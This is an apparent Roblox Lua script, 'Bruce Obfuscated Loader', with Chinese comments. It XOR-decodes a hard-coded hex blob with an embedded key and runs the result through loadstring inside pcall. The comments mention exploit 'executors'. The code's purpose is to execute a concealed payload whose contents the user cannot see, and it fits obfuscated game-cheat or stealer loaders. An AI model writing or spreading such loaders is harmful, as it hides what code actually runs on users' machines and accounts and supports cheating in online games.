-- Bruce Obfuscated Loader v1.2 (Compatibility Fixed)

-- 防重複執行
if _G.__BRUCE_LOADER_LOCK__ then return end
_G.__BRUCE_LOADER_LOCK__ = true

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer

-- Key & Data（不動原加密）
local _k = "BrUcE_9487_Key"
local _d = "\x1F\x0E\x06\x1C\x1A\x0F\x4A\x3B\x2D\x2E\x3E\x30\x1F\x4C\x5A\x44\x1E\x08\x0A\x0E\x1A\x1C\x4D\x38\x21\x3F\x21\x2B\x2E\x1D\x5F\x40\x57\x0A\x1C\x0B\x1A\x0E\x0A\x58\x27\x2A\x3A\x24\x22\x21\x3E\x14\x5B\x52\x45\x1F\x0E\x06\x1C\x1A\x0F\x4A\x3A\x3A\x20\x30\x22\x24\x3C\x18\x5E\x4C\x52\x0B\x1A\x0E\x1A\x08\x58\x2C\x2D\x22\x21\x3F\x24\x30\x19\x46\x5C\x53\x0A\x1C\x0B\x1A\x0E\x0A\x58\x2F\x23\x21\x2D\x2A\x3E\x36\x1A\x4A\x5D\x5B\x0F\x0E\x1C\x0B\x0F\x58\x20\x21\x2D\x23\x22\x2A\x36\x19\x5F\x55\x41\x0E\x1A\x1C\x0B\x0E\x5A\x31\x2C\x20\x3F\x22\x30\x37\x14\x46\x50\x44"

-- 安全 XOR（不依賴 bit32）
local function bxor(a, b)
    local r = 0
    local bit = 1
    while a > 0 or b > 0 do
        local aa = a % 2
        local bb = b % 2
        if aa ~= bb then
            r = r + bit
        end
        a = math.floor(a / 2)
        b = math.floor(b / 2)
        bit = bit * 2
    end
    return r
end

local function _x(s)
    local r = {}
    local klen = #_k
    for i = 1, #s do
        local c = s:byte(i)
        local k = _k:byte((i - 1) % klen + 1)
        r[i] = string.char(bxor(c, k))
    end
    return table.concat(r)
end

-- 解密
local decoded = _x(_d)
if type(decoded) ~= "string" or #decoded < 20 then
    -- 解密失敗通常是 executor 攔截，直接停，不亂踢
    warn("Bruce Loader: decode failed")
    return
end

-- 兼容 loadstring / load
local loader = loadstring or load
if type(loader) ~= "function" then
    warn("Bruce Loader: load not supported")
    return
end

local ok, fn = pcall(loader, decoded)
if not ok or type(fn) ~= "function" then
    warn("Bruce Loader: compile failed")
    return
end

-- 執行主體
pcall(fn)

